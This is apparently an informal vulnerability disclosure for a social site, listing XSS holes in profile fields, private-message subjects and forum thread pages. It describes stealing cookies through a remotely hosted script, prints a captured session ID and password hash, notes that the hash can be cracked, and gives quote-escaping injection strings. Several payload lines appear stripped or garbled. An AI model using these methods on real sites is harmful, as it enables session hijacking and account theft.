|
Yourfacesucks.com=0D
=0D
Homepage:=0D
http://www.yourfacesucks.com=0D
=0D
Effected files:=0D
=0D
music/video input boxes in editing profile=0D
subject box of sending a PM=0D
thread.php=0D
=0D
---------------------------------------=0D
=0D
XSS Vuln with cookie disclosure in profile input boxes:=0D
=0D
No filter evasion needed here. For PoC try putting in Music/Video input box.=0D
=0D
And the cookie data we see is:=0D
This is remote text via xss.js located at youfucktard.com PHPSESSID=bdee69f9a82b5333bc365f01447b8afc; db_user=luny666; loggedin=1; status=0; sessuid=18304; md5pass=91da4589b012c2fe1ceac1fb2363dbc6; onlineid=274562 =0D
=0D
=0D
Breaking down our cookie:=0D
PHPSESSID = (Our php session ID)=0D
=0D
db_user= (Our username)=0D
=0D
loggedin= (Logged in:yes)=0D
=0D
staus=0 (Probably means our profile has not been approved yet=0D
=0D
sessuid = (Session userid)=0D
=0D
md5pass= (md5 hash of our password)=0D
=0D
onlineid= (Our userid #)=0D
=0D
So, now we know our username (luny666) and our password hash, which can easily be cracked.=0D
=0D
Screenshots:=0D
http://www.youfucktard.com/xsp/facesucks1.jpg=0D
http://www.youfucktard.com/xsp/facesucks2.jpg=0D
=0D
----------------------------------------------=0D
=0D
Sending PM's XSS Vuln:=0D
=0D
No filter evasion needed,in the subject box put:=0D
=0D
=0D
Screenshot:=0D
http://www.youfucktard.com/xsp/facesucks3.jpg=0D
=0D
----------------------------------------------=0D
=0D
Viewing threads on thread.php:=0D
=0D
Escaping quotes with a few empty tags try putting this for a PoC=0D
=0D
Viewing the forum (The whole page fills with this vuln, got about 25 popups with this):=0D
=0D
">">">">">'><"<"<"<"<<"">=0D">http://www.yourfacesucks.com/forums/thread.php?forumid=15">">">">">">'><"<"<"<"<<"">=0D
=0D
=0D
Viewing a specific thread in the forum:=0D
=0D
">">">">">'><"<"<"<"<<"">=0D">http://www.yourfacesucks.com/forums/thread.php?forumid=15&threadid=51713">">">">">">'><"<"<"<"<<"">=0D